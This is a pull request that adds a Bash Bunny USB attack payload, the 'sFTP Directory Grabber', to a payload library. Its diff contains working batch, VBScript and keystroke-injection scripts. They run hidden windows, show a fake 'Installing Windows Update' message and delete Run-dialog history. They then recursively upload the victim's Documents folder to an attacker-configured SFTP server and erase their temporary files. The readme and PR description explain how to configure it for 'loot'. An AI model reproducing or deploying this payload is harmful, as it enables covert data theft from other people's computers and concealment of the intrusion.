### PR TITLE
Add files via upload

### DIFF
--- a/payloads/library/sFTP Directory Grabber/d.cmd
+++ b/payloads/library/sFTP Directory Grabber/d.cmd
@@ -1,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit

--- a/payloads/library/sFTP Directory Grabber/e.cmd
+++ b/payloads/library/sFTP Directory Grabber/e.cmd
@@ -1,0 +1,36 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+SET sftphost=username@hostname.domain.com
+SET sftppass=password
+SET lootfrom=%userprofile%\Documents
+SET looto=/loot
+SET unique=%RANDOM%
+REM Create FTP script
+@echo lcd "%lootfrom%" >%TEMP%\test2.txt
+@echo cd "%looto%" >>%TEMP%\test2.txt
+@echo mkdir %computername%_%unique% >>%TEMP%\test2.txt
+@echo cd %computername%_%unique% >>%TEMP%\test2.txt
+@echo mput -r *. >>%TEMP%\test2.txt
+@echo quit >>%TEMP%\test2.txt
+REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
+REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %TEMP%\PAYLOAD_FOLDER_IN_ROOT
+
+REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
+copy %~dp0\..\..\psftp.exe "%TEMP%\psftp.exe"
+
+REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
+REM start "" "%TEMP%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
+
+REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
+start /wait /min "" "%TEMP%\psftp.exe" -pw %sftppass% %sftphost% -b "%TEMP%\test2.txt"
+REM Clean Up payload parameter files
+DEL %TEMP%\psftp.exe /q
+DEL %TEMP%\test2.txt /q
+REM Blink CAPSLOCK key (from usb_exfiltrator)
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit

--- a/payloads/library/sFTP Directory Grabber/i.vbs
+++ b/payloads/library/sFTP Directory Grabber/i.vbs
@@ -1,0 +1,1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

--- a/payloads/library/sFTP Directory Grabber/payload.txt
+++ b/payloads/library/sFTP Directory Grabber/payload.txt
@@ -1,0 +1,36 @@
+#!/bin/bash
+#
+# Title:         ExecutableInstaller with sftp recursive directory grab for Bash Bunnys
+# Author:        IMcPwn
+# Revision for SFTP: Mule Skinner
+# Version:       1.0
+# Target:        Windows 7+
+# NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!
+# 
+# Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.
+# e.cmd is excuted invisibly using i.vbs
+# which in turn copies psftp.exe from the root of the Bash Bunny and then executes it
+# Change these settings inside of e.cmd
+# sftphost=username@hostname.domain.com
+# sftppass=password
+# SET lootfrom=c:\users\username\documents
+# SET looto=/loot
+#
+#IMPORTANT: 
+#To Download psftp.exe please use one of the links below:
+#32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
+#64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
+#Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
+#
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+
+# Green LED for finished
+LED G

--- a/payloads/library/sFTP Directory Grabber/readme.md
+++ b/payloads/library/sFTP Directory Grabber/readme.md
@@ -1,0 +1,45 @@
+# ExecutableInstaller with sftp recursive directory grab for Bash Bunnys
+
+* Author: IMcPwn
+* Revision for SFTP: Mule Skinner
+* Version: Version 1.0
+* Target: Windows
+* NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!
+
+## Description
+
+Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.
+
+## Configuration
+
+By default the staged payload copies the payload psFTP.exe from the root of the Bash Bunnyand executes it via e.cmd.
+The payload copies to %TEMP%, change this to wherever you like by editing e.cmd.
+You may also copy a payload inside a directory, see comments in e.cmd.
+Make changes to e.cmd for your sFTP user@domain.com, sFTP password, sftp directory for loot and target machine directory 
+for loot to be taken from. Variables are as follows:
+
+sftphost=username@hostname.domain.com
+sftppass=password
+lootfrom=c:\users\username\documents
+looto=/loot
+
+IMPORTANT: 
+
+To Download psftp.exe please use one of the links below:
+
+32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
+
+64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
+
+Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
+
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red                | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")


### PR DESCRIPTION
# ExecutableInstaller with sftp recursive directory grab for Bash Bunnys

* Author: IMcPwn
* Revision for SFTP: Mule Skinner
* Version: Version 1.0
* Target: Windows
* NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!

## Description

Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.

## Configuration

By default the staged payload copies the payload psFTP.exe from the root of the Bash Bunnyand executes it via e.cmd.
The payload copies to %TEMP%, change this to wherever you like by editing e.cmd.
You may also copy a payload inside a directory, see comments in e.cmd.
Make changes to e.cmd for your sFTP user@domain.com, sFTP password, sftp directory for loot and target machine directory 
for loot to be taken from. Variables are as follows:

sftphost=username@hostname.domain.com
sftppass=password
lootfrom=c:\users\username\documents
looto=/loot

IMPORTANT: 

To Download psftp.exe please use one of the links below:

32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe

64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe

Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.


## STATUS

| LED                | Status                                       |
| ------------------ | -------------------------------------------- |
| Red                | Attack Setup                                 |
| Green              | Attack Complete                              |

## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")
